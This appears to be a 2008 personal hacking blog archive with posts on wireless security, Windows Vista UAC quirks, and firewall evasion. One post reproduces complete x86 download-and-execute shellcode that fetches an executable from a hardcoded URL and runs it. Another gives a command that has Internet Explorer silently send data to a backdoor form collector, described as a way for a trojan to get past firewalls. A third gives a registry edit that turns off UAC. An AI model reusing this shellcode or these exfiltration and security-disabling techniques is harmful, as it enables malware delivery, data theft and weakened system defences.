Beng Hacks: March 2008

Monday, March 24, 2008

Thank you DL

Hahah I read smiling the article today in DL (hokay I admit I read DL sometimes, but mostly to laugh!) and read the wireless article.

Thank you DL for telling everyone to boost their signal strength! Best, pls tell everyone to have a network that supports convergence devices! Everyone knows that most convergence devices can't support the better encryption methods (if AT ALL) like WPA and WPA2. That means a convergence network in a neighbourhood that has wireless is most likely to be unsecured.

So... Serangoon u say... hokay noted!

Sunday, March 16, 2008

Fooling around with Vista

kk played with Vista abit over the weekend. The first thing of cuz I noticed is the UAC or User Access Control system: everytime you install a program you are asked about it, and every app that runs is run under a limited user account. On top of that, if you installed a program that changes files (eg config files) the original file (if placed in special protected folders like Program Files) isn't modified but placed in a special folder called ProgramData.

BUT BUT BUT

What's this, if you right-click on any exe or app, there is an option called "Run As Administrator". This removes the limited user account applied to the usage. Also, you can turn off UAC so that everytime you do something it doesn't prompt u ever again:

HKEY_LOCAL_MACHINE\
Software\
Microsoft\
Windows\
CurrentVersion\
Policies\
System

Under EnableLUA set to 0!

So... what's the bottom line? If it can be done by the user, it can be done programmatically. And u noe wat, after using it for awhile, Vista seems identical to XP/2K, just prettier. I still can't turn on Aero even tho my Index is 4.8 grrrr I want my sexah tabbing windows!

And why oh why can't I run VC++ 6.0 in Vista?? Thank the heavens for virtualisation.

I was also trying out Vista's "wonderful" volume shrinking feature; yeah you can resize your partitions inside Vista. yeah, you WISH! Actually you can only SHRINK existing vista volumes, but there's a problem: if there are protected files in the way, you won't be allowed to shrink past it. For example if your partition is 80GB and Vista put a restart point or pagefile or MFT in the 79GB part of the HDD, you can only shrink ur 80GB partition to 79GB HAHAHAHA. Bad news tho, my PartitionMagic cannot understand Vista partitions sob sob so partition first or suck thumb.

I also discovered a hidden feature by accident (tho after googling it's not that new heheh), if you rightclick the right pane of Windows Explorer you can get Command Prompt from that folder. But why right pane? Why not add to the GUI?? To get away from the Black Screen of Doom? Then why add it anyway?

Ok last annoyance I'll write about (or maybe feature from heaven! hmmm should I even write about it~~~)... kk guess what, now there are TWO places to check for apps to uninstall, under Add/Remove Programs in your Control Panel, AND....

in Windows Defender! WTF under Tools->Software Explorer, there are tons more apps installed there. Hidden! Hehehe ideas ideas... so much to learn so little time...

Thursday, March 13, 2008

Some nice stuff

Courtesy of my friend snooq!

; Author : snooq [http://www.redpuffer.net/snooq/]
; Date : 12 August 2005


[BITS 32]
mov eax, [fs:0x30]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov esi, [eax + 0x08]

push esi ; kernel32.dll ; [ebp + 0x2c] -> a handy placeholder..
push 0xec0e4e8e ; LoadLibraryA ; [ebp + 0x28]
push 0x16b3fe72 ; CreateProcessA ; [ebp + 0x24]
push 0x60e0ceef ; ExitThread ; [ebp + 0x20]
push 0x7c0017a5 ; CreateFileA ; [ebp + 0x1c]
push 0xe80a791f ; WriteFile ; [ebp + 0x18]
push 0x0ffd97fb ; CloseHandle ; [ebp + 0x14]
push 0xb46984e7 ; HeapCreate ; [ebp + 0x10]
push 0x57e84429 ; InternetOpenA ; [ebp + 0x0c]
push 0x7e0fed49 ; InternetOpenUrlA ; [ebp + 0x08]
push 0x5fe34b8b ; InternetReadFile ; [ebp + 0x04]

push ebp
mov ebp, esp

push byte 0x0a ; # of functions to find
pop ecx
L1:
cmp cl, 0x03 ; to load wininet.dll
je Load_WININET

L2:
push dword [ebp + 0x2c]
push dword [ebp + ecx * 0x04]
call GetProcAdd
mov [ebp + ecx * 0x04], eax
loop L1

jmp short Download

Load_WININET:
push ecx
push 0x0074656e
push 0x696e6977 ; 'wininet'
push esp
call [ebp + 0x28] ; LoadLibraryA
mov [ebp + 0x2c], eax ; wininet.dll
pop ecx
pop ecx
pop ecx
jmp short L2

Download:
xor ebx, ebx
push ebx
push 0x00000065 ; 000e
push 0x78652e61 ; xe.a
push 0x2f6d6f63 ; /moc
push 0x2e72656b ; .rek
push 0x6361682f ; cah/
push 0x2f3a7074 ; /:pt
push 0x74680065 ; th e
push 0x78652e61 ; xe.a

dec ebx
shr ebx, 0x0e
push ebx
shr ebx, 0x01
push ebx
push byte 0x04
call [ebp + 0x10] ; HeapCreate()
mov [ebp + 0x30], eax ; [ebp + 0x30] -> heap handle

xor edx, edx
push edx
push edx
push edx
push edx
push edx
call [ebp + 0x0c] ; InternetOpenA()
mov [ebp + 0x34], eax

; [ebp-0x09] -> filename
; [ebp-0x1e] -> url

mov ecx, esp
add ecx, 0x06
push edx
push edx
push edx
push edx
push ecx
push dword [ebp + 0x34]
call [ebp + 0x08] ; InternetOpenUrlA()
mov [ebp + 0x34], eax ; [ebp + 0x34] -> HINTERNET

mov ecx, esp
xor edx, edx
push edx
push edx
push 0x02
push edx
push edx
push dword 0x40000000
push ecx
call [ebp + 0x1c] ; CreateFile()
mov [ebp + 0x38], eax ; [ebp + 0x38] -> file handle

mov ecx, ebp
add ecx, 0x3c ; [ebp + 0x3c] -> rlen
push ecx
push ebx
push dword [ebp + 0x30]
push dword [ebp + 0x34]
call [ebp + 0x04] ; InternetReadFile()

mov ecx, ebp
add ecx, 0x40 ; [ebp + 0x40] -> wlen
xor edx, edx
push edx
push ecx
push dword [ebp + 0x3c]
push dword [ebp + 0x30]
push dword [ebp + 0x38]
call [ebp + 0x18] ; WriteFile()

push dword [ebp + 0x38]
call [ebp + 0x14] ; CloseHandle()

mov edx, esp

sub esp, 0x54
lea edi, [esp]
xor eax, eax
push byte 0x15
pop ecx
rep stosd

mov byte [esp + 0x10], 0x44 ; SI.** = sizeof(si)
lea ebx, [esp + 0x10] ; SI
push esp ; PI
push ebx
push eax
push eax
push eax
push eax
push eax
push eax
push edx
push eax
call [ebp + 0x24] ; CreateProcessA()

call [ebp + 0x20] ; ExitThread()

; Function to retrive function address
; Parameters: function hash, dll base
; Return: function address

GetProcAdd:
push ecx
push esi

mov esi, [esp + 0x10] ; dll base
mov eax, [esi + 0x3c] ; PE header address
mov edx, [esi + eax + 0x78] ; Export table relative offset
add edx, esi ; Export table address
mov ecx, [edx + 0x18] ; Number of names
mov ebx, [edx + 0x20] ; Names table relative offset
add ebx, esi ; Names table address

Find:
jecxz Done
dec ecx
mov esi, [ebx + ecx * 0x04] ; Relative offset of the name
add esi, [esp + 0x10] ; ptr to current name

xor edi, edi
xor eax, eax
cld

Hash:
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz Compare ; If the ZF is set, we've hit the null term.
ror edi, 0xd ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp short Hash ; Next iteration


Compare:
cmp edi, [esp + 0x0c] ; Compare 2 hashes
jnz Find
mov ebx, [edx + 0x24] ; Ordinals table relative offset
add ebx, [esp + 0x10] ; Ordinals table address
mov cx, [ebx + ecx * 0x02] ; Extrapolate the function's ordinal
mov ebx, [edx + 0x1c] ; Address table relative offset
add ebx, [esp + 0x10] ; Address table address
mov eax, [ebx + ecx * 0x04] ; Extract the relative function offset from its ordinal
add eax, [esp + 0x10] ; Function address

Done:
pop esi
pop ecx
ret 0x08

nop
nop
nop
nop
nop
nop
nop
nop


Can you figure out what it does? :)

Tuesday, March 11, 2008

Command-line Internet access

Everyone who has half a brain uses a firewall. Even M$ gave you a free (but kinda useless) firewall called Windows Firewall (or Windows Defender on Vista). However, most software firewalls like ZoneAlarm are application firewalls first, meaning they block or allow based on the application trying to get access. What's one of the first applications you allow thru the firewall? IEXPLORE.EXE (Windows Internet Explorer), FIREFOX.EXE (Mozilla Firefox) and Opera (OPERA.EXE).

Did you know it's possible to use these exe to execute and access the internet without you knowing? No popup, no fancy GUI window nothing. And because your firewall already allowed it, you don't even know the internet was being accessed.

For example: C:\Progra~1\Intern~1\iexplore.exe http://mybackdoorhost.domain.com/formcollector.php?name=value&

This will fire up IEXPLORE on the command line and access a webform on my website to dump data. If I had a trojan in your PC, my EXE need only fire up this on the command line to grab info from you. No need to learn how to code for HTTP, FTP, etc, just use IEXPLORE, and best part since you already allow access through the firewall, I dun even need to worry about hooking and stuff.

Wonderful right? Think you're safe? Think again!!

So what's the solution here? Hard to say really. How to block a possible trojan like this yet allow yourself internet access? You can't say dun use iexplore use firefox instead, cuz the trojan can try both. Frankly, the IT systems we normal people use today (Windows OS) is totally inadequate to prevent such attacks. All of us are vulnerable to this, regardless, unless you tell me you dun use internet.

One possible solution is to change your internet surfing habits. Use an old PC, run Linux or Mac, use that for Internet surfing or your personal email and stuff. Confidential info stuff AND dun ever ever download files or plug in thumbdrives into that PC. Then you have another PC for your online gaming and chat and stuff. Lessen the damage only but still lessen.

How about Vista? Sadly I dunno, but I suspect UAC on Vista *can* help in this regard. Still exploring it on my *ahem* copy, keep you posted.